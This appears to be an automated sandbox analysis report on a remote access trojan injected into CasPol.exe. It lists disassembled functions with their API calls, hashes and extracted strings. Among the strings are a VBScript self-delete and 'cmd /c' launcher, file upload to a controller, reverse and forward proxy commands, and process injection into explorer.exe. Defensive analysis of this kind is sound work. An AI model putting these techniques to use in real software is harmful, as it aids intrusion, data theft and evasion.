Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18

Function 00444F4D Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00444FBD
_free.LIBCMT ref: 00444FD3
_free.LIBCMT ref: 00444FE4
_free.LIBCMT ref: 00444FF5
_free.LIBCMT ref: 0044500C
GetCPInfo.KERNEL32(?,?), ref: 00445054

Part of subcall function 00451C2B: _free.LIBCMT ref: 00451C96

_free.LIBCMT ref: 00445200
_free.LIBCMT ref: 00445213
_free.LIBCMT ref: 00445221
_free.LIBCMT ref: 0044522C
_free.LIBCMT ref: 0044526E
_free.LIBCMT ref: 00445276
_free.LIBCMT ref: 0044527E
_free.LIBCMT ref: 00445286
_free.LIBCMT ref: 00445294

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64

Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
__aulldiv.LIBCMT ref: 00407FE9
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
CloseHandle.KERNEL32(00000000), ref: 00408200
CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
CloseHandle.KERNEL32(00000000), ref: 00408256

Strings

ReadFile error, xrefs: 0040822E
>G, xrefs: 00407E87
Uploading file to Controller: , xrefs: 00408077
SetFilePointerEx error, xrefs: 00408266

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
API String ID: 1884690901-3066803209
Opcode ID: 142f1f72e0f29cad2ac4c499a5babf56d922c15ed98ea3bc8be458cd3ff9b4fd
Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
Opcode Fuzzy Hash: 142f1f72e0f29cad2ac4c499a5babf56d922c15ed98ea3bc8be458cd3ff9b4fd
Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B

Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 00409E62

Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40

Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049

Strings

xAG, xrefs: 00409E83
XCG, xrefs: 00409ECE
@CG, xrefs: 00409F19
@CG, xrefs: 00409F24
xAG, xrefs: 00409E93
XCG, xrefs: 0040A029

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: @CG$@CG$XCG$XCG$xAG$xAG
API String ID: 3795512280-3163867910
Opcode ID: cb598f5ef60ca0eca7745399a51d84c8660353be19ff15f145444b1f1551c77f
Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
Opcode Fuzzy Hash: cb598f5ef60ca0eca7745399a51d84c8660353be19ff15f145444b1f1551c77f
Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A

Function 0045007D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 004500C1

Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8

_free.LIBCMT ref: 004500B6

Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD

_free.LIBCMT ref: 004500D8
_free.LIBCMT ref: 004500ED
_free.LIBCMT ref: 004500F8
_free.LIBCMT ref: 0045011A
_free.LIBCMT ref: 0045012D
_free.LIBCMT ref: 0045013B
_free.LIBCMT ref: 00450146
_free.LIBCMT ref: 0045017E
_free.LIBCMT ref: 00450185
_free.LIBCMT ref: 004501A2
_free.LIBCMT ref: 004501BA

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719

Function 00419138 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041913D
GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
Sleep.KERNEL32(000003E8), ref: 0041927D
GetLocalTime.KERNEL32(?), ref: 0041928C
Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375

Strings

XCG, xrefs: 0041924C
XCG, xrefs: 0041919A
time_%04i%02i%02i_%02i%02i%02i, xrefs: 00419223
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 0041921E, 00419239, 004192B0
XCG, xrefs: 0041932E

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 489098229-65789007
Opcode ID: 20ad9dcad6b4c7da979322c167eeb5490f5651d63a6c5e78ab6e583428f79961
Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
Opcode Fuzzy Hash: 20ad9dcad6b4c7da979322c167eeb5490f5651d63a6c5e78ab6e583428f79961
Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799

Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC

Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
ExitProcess.KERNEL32 ref: 0040C832

Strings

CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040C7D5
Temp, xrefs: 0040C708
open, xrefs: 0040C820
.vbs, xrefs: 0040C6CD
""", 0, xrefs: 0040C74F
@CG, xrefs: 0040C67D
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040C767
exepath, xrefs: 0040C69F

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-390638927
Opcode ID: 71ed8149d107c801a58795291cbbf560ec2e2514c0515b8670bbce909e4cd16b
Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
Opcode Fuzzy Hash: 71ed8149d107c801a58795291cbbf560ec2e2514c0515b8670bbce909e4cd16b
Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99

Function 0044F3F1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F439
_free.LIBCMT ref: 0044F45D
_free.LIBCMT ref: 0044F46A
_free.LIBCMT ref: 0044F48F
_free.LIBCMT ref: 0044F49C
_free.LIBCMT ref: 0044F4A5
_free.LIBCMT ref: 0044F783
_free.LIBCMT ref: 0044F78B

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768

Function 00454992 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D

GetLastError.KERNEL32 ref: 00454AA6
__dosmaperr.LIBCMT ref: 00454AAD
GetFileType.KERNEL32(00000000), ref: 00454AB9
GetLastError.KERNEL32 ref: 00454AC3
__dosmaperr.LIBCMT ref: 00454ACC
CloseHandle.KERNEL32(00000000), ref: 00454AEC
CloseHandle.KERNEL32(?), ref: 00454C36
GetLastError.KERNEL32 ref: 00454C68
__dosmaperr.LIBCMT ref: 00454C6F

Strings

H, xrefs: 00454BF4

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A

Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

udp, xrefs: 00413D17, 00413D1F, 00413D23
65535, xrefs: 00413C6A

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E

Function 00439371 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
__dosmaperr.LIBCMT ref: 004393DD
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
__dosmaperr.LIBCMT ref: 0043941A
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
__dosmaperr.LIBCMT ref: 0043946E
_free.LIBCMT ref: 0043947A
_free.LIBCMT ref: 00439481

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 7d52e2fbbdbfe11ab4c2d7ae9a425497261befc8dca55fd6b38b522b0d4b8486
Instruction ID: 6a201652548b5938c51769f65cd316b483991bd1e06270b2389e89ad89b884a4
Opcode Fuzzy Hash: 7d52e2fbbdbfe11ab4c2d7ae9a425497261befc8dca55fd6b38b522b0d4b8486
Instruction Fuzzy Hash: AA31007280860ABFDF11AFA5DC45CAF3B78EF09364F10416AF81096291DB79CC11DBA9

Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00404E71
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
TranslateMessage.USER32(?), ref: 00404F30
DispatchMessageA.USER32(?), ref: 00404F3B
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Strings

DisplayMessage, xrefs: 00404F9E
CloseChat, xrefs: 00404FBB
GetMessage, xrefs: 00404FAA

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: cbb5f636b947a9be11331952989b716aa7a045616e8d2ead7045bb7ad60c484e
Instruction ID: 321c3fbec734f1f8b9fff4e8d6f05c27936dabaea61c0bf38d797d3438e015d2
Opcode Fuzzy Hash: cbb5f636b947a9be11331952989b716aa7a045616e8d2ead7045bb7ad60c484e
Instruction Fuzzy Hash: F641BEB16043016BC614FB75D85A8AE77A8ABC1714F00093EF906A31E6EF38DA04C79A

Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
CloseHandle.KERNEL32(00000000), ref: 00416F2D
DeleteFileA.KERNEL32(00000000), ref: 00416F3C
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Strings

@, xrefs: 00416ED2
Temp, xrefs: 00416E48
@FG, xrefs: 00416F69
@FG, xrefs: 00416EFD
<, xrefs: 00416ECB

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
String ID: <$@$@FG$@FG$Temp
API String ID: 1107811701-2245803885
Opcode ID: 7554bfeb40c4b2af2b7365563deb2cc3d5ba60fa6237755d2b448c11faa41bd7
Instruction ID: 31b483d39f6b5d6935d3c54cd29663daa4ef68f058b88688fc76c4b473729b01
Opcode Fuzzy Hash: 7554bfeb40c4b2af2b7365563deb2cc3d5ba60fa6237755d2b448c11faa41bd7
Instruction Fuzzy Hash: 3C318B319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99

Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705

Strings

BG3i@, xrefs: 0040662C, 00406637
PEB: %x, xrefs: 00406716
explorer.exe, xrefs: 004066BD, 004066E2
\explorer.exe, xrefs: 0040666A
[+] NtAllocateVirtualMemory Success, xrefs: 0040667A
windir, xrefs: 00406654
[-] NtAllocateVirtualMemory Error, xrefs: 004066AA

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
API String ID: 2050909247-4145329354
Opcode ID: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
Instruction ID: 85e9bb49d37c82d50cc0a876bfe2e9cbcca00efa80d213bdcfc81b1d75d5651e
Opcode Fuzzy Hash: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
Instruction Fuzzy Hash: FF31CA75240300AFC310AB6DEC49F6A7768EB44705F11443EF50AA76E1EB7998508B6D

Function 00419C95 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
Instruction ID: 64b7f8b9d702139b787b45b2ac21df1fde646642379ff803e7b0347eb9faadae
Opcode Fuzzy Hash: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
Instruction Fuzzy Hash: 8711C631901218AFD7116B64EC85DFF3BECDB46BA1B000036F942921D1DB64CD46AAF5

Function 00446DDB Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00446DEF

Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD

_free.LIBCMT ref: 00446DFB
_free.LIBCMT ref: 00446E06
_free.LIBCMT ref: 00446E11
_free.LIBCMT ref: 00446E1C
_free.LIBCMT ref: 00446E27
_free.LIBCMT ref: 00446E32
_free.LIBCMT ref: 00446E3D
_free.LIBCMT ref: 00446E48
_free.LIBCMT ref: 00446E56

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
Instruction ID: 4059f081e6094245f9dcb18e84e070fbb06f55adf0c09f86c969ccb3ae0415ae
Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
Instruction Fuzzy Hash: 0E11CB7550051CBFDB05EF55C842CDD3B76EF06364B42C0AAF9086F222DA75DE509B85

Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00410333
inet_ntoa.WS2_32(?), ref: 004103CE

Strings

>G, xrefs: 00410359
GetDirectListeningPort, xrefs: 004104D1
StopForward, xrefs: 004104AF
StartForward, xrefs: 00410492
StartReverse, xrefs: 0041049E
StopReverse, xrefs: 004104C0

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
API String ID: 3578746661-4192532303
Opcode ID: 7a3eb9bb34aefebffdfa72ae085434fee76c639cdb65a0c6d939355de7a733be
Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
Opcode Fuzzy Hash: 7a3eb9bb34aefebffdfa72ae085434fee76c639cdb65a0c6d939355de7a733be
Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E

Function 00455149 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DBF), ref: 0045516C

Strings

pow, xrefs: 00455250, 004552FC, 0045530F
asin, xrefs: 004552D8
sqrt, xrefs: 004552F0
acos, xrefs: 004552E4
log10, xrefs: 004551B6, 00455206
exp, xrefs: 00455231, 00455293
log, xrefs: 00455212, 0045521E

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
Instruction ID: dc575b74d0f085a316b11c585a5ec2812edae3f3668b4c4373b6e849a421fba0
Opcode Fuzzy Hash: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
Instruction Fuzzy Hash: F7517D70900A09CBCF149FA9E9581BDBBB0FB09342F244197EC45A7366DB7D8A188B1D

Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C

Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643

Sleep.KERNEL32(00000064), ref: 00416688
DeleteFileW.KERNEL32(00000000), ref: 004166BC

Strings

dxdiag, xrefs: 00416651
/t , xrefs: 0041663B
\sysinfo.txt, xrefs: 00416607
temp, xrefs: 0041660C
open, xrefs: 00416656

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: a567638598e5f64f9f586ec3897bdd5cda464973c2cc93408e6715b44c417110
Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
Opcode Fuzzy Hash: a567638598e5f64f9f586ec3897bdd5cda464973c2cc93408e6715b44c417110
Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D

Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401AD3

